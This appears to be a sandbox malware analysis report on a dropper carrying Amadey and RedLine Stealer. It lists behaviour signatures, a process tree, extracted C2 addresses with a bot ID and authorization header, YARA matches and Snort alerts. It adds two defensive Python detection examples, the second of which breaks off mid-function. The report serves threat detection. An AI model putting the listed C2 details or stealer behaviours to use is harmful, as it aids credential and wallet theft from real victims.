
Windows Analysis Report
szDGo5lHdI.exe

Overview

General Information

Sample Name: szDGo5lHdI.exe
Original Sample Name: d20ba0ceff50b0a05c84f694e28462aa.exe
Analysis ID: 829671
MD5: d20ba0ceff50b0a05c84f694e28462aa
SHA1: c7c3b70840660f8dd81770e3bd5200eb2feda120
SHA256: bfe36fe57256d59f04350be588333d644cf1aac03039d14dfce313aa60d42ced
Tags: exe, RedLineStealer

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • szDGo5lHdI.exe (PID: 4688 cmdline: C:\Users\user\Desktop\szDGo5lHdI.exe MD5: D20BA0CEFF50B0A05C84F694E28462AA)
    • kino0095.exe (PID: 5248 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe MD5: 566C1099548DF136503F4DC814D54B17)
      • kino2456.exe (PID: 5212 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe MD5: EBD95183957BECDB18025FC9D553B15E)
        • kino0588.exe (PID: 6088 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe MD5: 54A8FD200F50B6AF0F10CA6EB68471D3)
          • bus9402.exe (PID: 6120 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
          • con1332.exe (PID: 5144 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe MD5: 0B63FCA2981CA840B845011956E212AD)
        • dvL76s65.exe (PID: 1332 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe MD5: C49DABA1E54976E33808914E11DEE05B)
  • rundll32.exe (PID: 4968 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 812 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\" MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5892 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\" MD5: 73C519F050C20580F8A62C849D49215A)
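The process tree above is the dropper pattern this report records: the submitted sample is a wextract.exe stub (the IExpress self-extractor, see the wextract.pdb debug string under Compliance) that extracts into %TEMP%\IXP000.TMP and runs the next stub, which does the same into IXP001.TMP, and so on four layers deep, with each layer launching rundll32.exe advpack.dll,DelNodeRunDLL32 to delete its directory afterwards. The detection routine below is an added example, not Joe Sandbox output or code from this sample. It walks process-creation events whose fields are modelled on Sysmon Event ID 1; the sample events are constructed from the tree above with the PIDs and paths as reported, while the parent PID of the top-level process, the parent PIDs of the three rundll32 cleanup processes, and the benign single-layer IExpress control at the end are assumptions. The rule fires on nested IXP*.TMP extraction (depth 2 or more) and on the DelNodeRunDLL32 cleanup, and leaves a single-layer IExpress package alone, since those are used by legitimate installers.

```python
"""Flag the nested IExpress/wextract dropper chain recorded in the process tree.

Added example (not Joe Sandbox output). Event fields are modelled on Sysmon
Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine); the sample events
are constructed from the process tree in the report, with the parent PIDs of
the rundll32 cleanup processes assumed to be the stub that spawned them.
"""
import re
from dataclasses import dataclass

# wextract.exe (the IExpress self-extractor stub) extracts its embedded cabinet
# into %TEMP%\IXPnnn.TMP before launching the payload it contains ...
IXP_DIR = re.compile(r"\\AppData\\Local\\Temp\\IXP\d{3}\.TMP\\", re.IGNORECASE)
# ... and schedules advpack.dll,DelNodeRunDLL32 to delete that directory afterwards.
DELNODE = re.compile(r"advpack\.dll,DelNodeRunDLL32", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def ixp_depth(event, by_pid):
    """Count consecutive ancestors (the event itself included) that run from an
    IXP*.TMP directory. 1 is an ordinary IExpress package; 2 or more means a
    self-extractor was itself dropped by a self-extractor."""
    depth = 0
    cur = event
    while cur is not None and IXP_DIR.search(cur.image):
        depth += 1
        cur = by_pid.get(cur.ppid)
    return depth


def classify(events):
    """Return (pid, reason) findings for one host's process-creation stream."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        depth = ixp_depth(e, by_pid)
        if depth >= 2:
            findings.append((e.pid, f"nested IXP*.TMP extraction, depth {depth}"))
        if (e.image.lower().endswith("rundll32.exe")
                and DELNODE.search(e.cmdline) and IXP_DIR.search(e.cmdline)):
            findings.append((e.pid, "wextract cleanup of IXP*.TMP via DelNodeRunDLL32"))
    return findings


def flagged_pids(events):
    return sorted({pid for pid, _ in classify(events)})


T = r"C:\Users\user\AppData\Local\Temp"
RUNDLL = r"C:\Windows\system32\rundll32.exe"


def _stub(pid, ppid, path):
    return ProcEvent(pid, ppid, path, path)


def _cleanup(pid, ppid, ixp):
    # Command line as wextract issues it (matches the report's process tree).
    cmd = f'"{RUNDLL}" C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 "{T}\\{ixp}\\"'
    return ProcEvent(pid, ppid, RUNDLL, cmd)


# Constructed from the report's process tree (PIDs and paths as reported).
SAMPLE_EVENTS = [
    _stub(4688, 1000, r"C:\Users\user\Desktop\szDGo5lHdI.exe"),  # parent PID 1000 assumed
    _stub(5248, 4688, T + r"\IXP000.TMP\kino0095.exe"),
    _stub(5212, 5248, T + r"\IXP001.TMP\kino2456.exe"),
    _stub(6088, 5212, T + r"\IXP002.TMP\kino0588.exe"),
    _stub(6120, 6088, T + r"\IXP003.TMP\bus9402.exe"),
    _stub(5144, 6088, T + r"\IXP003.TMP\con1332.exe"),
    _stub(1332, 5212, T + r"\IXP002.TMP\dvL76s65.exe"),
    _cleanup(4968, 4688, "IXP000.TMP"),  # parent PIDs of the cleanups assumed
    _cleanup(812, 5248, "IXP001.TMP"),
    _cleanup(5892, 5212, "IXP002.TMP"),
    # Constructed benign control: a single-layer IExpress package launched from
    # Downloads is a common legitimate pattern and must not be flagged.
    _stub(7001, 1000, r"C:\Users\user\Downloads\hotfix_pkg.exe"),
    _stub(7002, 7001, T + r"\IXP000.TMP\setup.exe"),
]

if __name__ == "__main__":
    for pid, reason in classify(SAMPLE_EVENTS):
        print(f"PID {pid}: {reason}")
```

On the sample stream this flags the five stubs at depth 2 to 4 (kino2456 through con1332, and dvL76s65) plus the three rundll32 cleanups, and nothing for the Desktop parent, the first-layer kino0095.exe, or the benign control.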
Malware family: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all, or specifically targeted, computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware family: RedLine Stealer
Description: RedLine Stealer is malware sold on underground forums, apparently either standalone ($100/$150 depending on the version) or on a subscription basis ($100/month). It harvests information from browsers such as saved credentials, autocomplete data, and credit card information. It also takes a system inventory of the target machine, including the username, location data, hardware configuration, and installed security software. More recent versions added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted, and the malware can upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Extracted malware configuration
Amadey: {"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}
RedLine: {"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}
Yara Overview

PCAP (Network Traffic)
Source: dump.pcap | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: dump.pcap | Rule: JoeSecurity_RedLine_1 | Description: Yara detected RedLine Stealer | Author: Joe Security

Dropped Files
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings:
  • 0x1a434:$pat14: , CommandLine:
  • 0x134a7:$v2_1: ListOfProcesses
  • 0x13286:$v4_3: base64str
  • 0x13dff:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x12811:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security

Memory Dumps
Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings:
  • 0x2d742:$pat14: , CommandLine:
  • 0x1f823:$v2_1: ListOfProcesses
  • 0x1df49:$v4_3: base64str
  • 0x1df08:$v4_4: stringKey
  • 0x1df53:$v4_5: BytesToStringConverted
  • 0x1df3e:$v4_6: FromBase64
  • 0x1f4de:$v4_8: procName
  • 0x1cc30:$v5_5: FileScanning
  • 0x1ce4e:$v5_7: RecordHeaderField
  • 0x1cd80:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 05 88 44 24 2B 88 44 24 2F B0 95 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
(truncated in this export; the full memory-dump table has 22 entries)

Unpacked PEs
Source: 15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings:
  • 0x2c85a:$pat14: , CommandLine:
  • 0x1e93b:$v2_1: ListOfProcesses
  • 0x1d061:$v4_3: base64str
  • 0x1d020:$v4_4: stringKey
  • 0x1d06b:$v4_5: BytesToStringConverted
  • 0x1d056:$v4_6: FromBase64
  • 0x1e5f6:$v4_8: procName
  • 0x1bd48:$v5_5: FileScanning
  • 0x1bf66:$v5_7: RecordHeaderField
  • 0x1be98:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Source: 13.2.con1332.exe.2bf0e67.1.raw.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 13.2.con1332.exe.2bf0e67.1.raw.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen | Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 13.3.con1332.exe.2c20000.0.raw.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
(truncated in this export; the full unpacked-PE table has 37 entries)
                      No Sigma rule has matched
Snort IDS Alerts

SID: 2043231
Timestamp: 03/18/23-20:58:24.653479
Source: 192.168.2.3:49701
Destination: 193.233.20.30:4125
Protocol: TCP
Classtype: A Network Trojan was detected

SID: 2043233
Timestamp: 03/18/23-20:58:07.054155
Source: 192.168.2.3:49701
Destination: 193.233.20.30:4125
Protocol: TCP
Classtype: A Network Trojan was detected

SID: 2043234
Timestamp: 03/18/23-20:58:08.632497
Source: 193.233.20.30:4125
Destination: 192.168.2.3:49701
Protocol: TCP
Classtype: A Network Trojan was detected

                      AV Detection

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: szDGo5lHdI.exe | ReversingLabs: Detection: 46%
Source: szDGo5lHdI.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe | Virustotal: Detection: 79%
Source: szDGo5lHdI.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Joe Sandbox ML: detected
Source: 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}
Source: 0.3.szDGo5lHdI.exe.6f26a20.1.unpack | Malware Configuration Extractor: Amadey {"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}
Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00402F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_010B2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00962F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00962F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00192F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00192F1D

                      Compliance

Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Unpacked PE file: 0.2.szDGo5lHdI.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Unpacked PE file: 13.2.con1332.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Unpacked PE file: 15.2.dvL76s65.exe.400000.0.unpack
Source: szDGo5lHdI.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\szDGo5lHdI.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: wextract.pdb source: szDGo5lHdI.exe, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: szDGo5lHdI.exe, 00000000.00000003.260924559.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, ge821663.exe.0.dr
                      Source: Binary string: Healer.pdb source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wextract.pdbGCTL source: szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, bus9402.exe, 00000004.00000000.264403832.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, bus9402.exe.3.dr
                      Source: Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000000.300762945.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1332.exe.3.dr
                      Source: Binary string: _.pdb source: con1332.exe, 0000000D.00000002.328304640.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000003.304290466.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, dvL76s65.exe, 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\sigizecem\xigago\tukonunoz_givizadi\yodawusafix\11\j.pdb source: szDGo5lHdI.exe
                      Source: Binary string: Healer.pdbH5 source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00402390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_010B2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00962390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00962390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00192390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00192390

                      Networking

Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49701 -> 193.233.20.30:4125
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49701 -> 193.233.20.30:4125
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.30:4125 -> 192.168.2.3:49701
Source: Malware configuration extractor | URLs: 31.41.244.200/games/category/index.php
Source: Malware configuration extractor | URLs: 193.233.20.30:4125
Source: Joe Sandbox View | ASN Name: REDCOM-AS (Redcom, Khabarovsk, Russia, RU)
Source: Joe Sandbox View | IP Address: 193.233.20.30
Source: global traffic | TCP traffic: 192.168.2.3:49701 -> 193.233.20.30:4125
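The three Snort hits above fire on the RedLine C2 session to 193.233.20.30:4125, and the first of them is named for the "net.tcp Init": a WCF net.tcp client opens every connection with a .NET Message Framing (MC-NMF) preamble that names its target endpoint in clear text in the Via record, before any upgrade to TLS. The code below is an added example, not part of this report or of the Emerging Threats rules it cites; it assumes the session is a WCF net.tcp connection, which the rule name and the WS-Trust/WS-Security namespace strings from the WCF runtime found in the dvL76s65.exe memory dumps below are consistent with. The client hello is constructed to the MC-NMF record layout using the endpoint from the extracted configuration, not captured from this sample; the server side of the exchange is the single PreambleAck byte. The parser walks the records up to PreambleEnd, and the triage step flags what distinguishes this traffic from an ordinary WCF service: a bare IP literal as host and a port other than the net.tcp default of 808.

```python
"""Decode the .NET Message Framing (MC-NMF) preamble a WCF net.tcp client sends
on connect, and triage the Via URI it carries.

Added example, not part of the report or of the ET Snort rules it cites. It
assumes the RedLine C2 session on 193.233.20.30:4125 is a WCF net.tcp
connection, as the "net.tcp Init" signature name suggests; the client hello
below is constructed to the MC-NMF record layout, not captured from this sample.
"""
import ipaddress
from urllib.parse import urlsplit

# MC-NMF record type bytes
VERSION_RECORD, MODE_RECORD, VIA_RECORD = 0x00, 0x01, 0x02
KNOWN_ENCODING_RECORD, UPGRADE_REQUEST_RECORD = 0x03, 0x09
PREAMBLE_ACK_RECORD, PREAMBLE_END_RECORD = 0x0B, 0x0C

MODES = {0x01: "SingletonUnsized", 0x02: "Duplex", 0x03: "Simplex", 0x04: "SingletonSized"}
ENCODINGS = {0x00: "UTF-8 SOAP 1.1", 0x03: "UTF-8 SOAP 1.2", 0x07: "Binary",
             0x08: "Binary with in-band dictionary"}
NET_TCP_DEFAULT_PORT = 808


def _encode_size(n):
    """MC-NMF variable-length size: 7 bits per byte, little-endian, high bit set
    on every byte except the last."""
    out = bytearray()
    while True:
        b = n & 0x7F
        n >>= 7
        if n:
            out.append(b | 0x80)
        else:
            out.append(b)
            return bytes(out)


def _read_size(buf, pos):
    value = shift = 0
    for _ in range(5):                      # the size field is at most 5 bytes
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
    raise ValueError("size field longer than 5 bytes")


def parse_preamble(buf):
    """Walk the records up to PreambleEnd; return mode, via, encoding, upgrade."""
    if buf[:3] != bytes([VERSION_RECORD, 0x01, 0x00]):
        raise ValueError("not an MC-NMF 1.0 preamble")
    pos, out = 3, {"mode": None, "via": None, "encoding": None, "upgrade": None}
    while pos < len(buf):
        rec = buf[pos]
        pos += 1
        if rec == MODE_RECORD:
            out["mode"] = MODES.get(buf[pos], f"unknown(0x{buf[pos]:02x})")
            pos += 1
        elif rec == KNOWN_ENCODING_RECORD:
            out["encoding"] = ENCODINGS.get(buf[pos], f"unknown(0x{buf[pos]:02x})")
            pos += 1
        elif rec in (VIA_RECORD, UPGRADE_REQUEST_RECORD):
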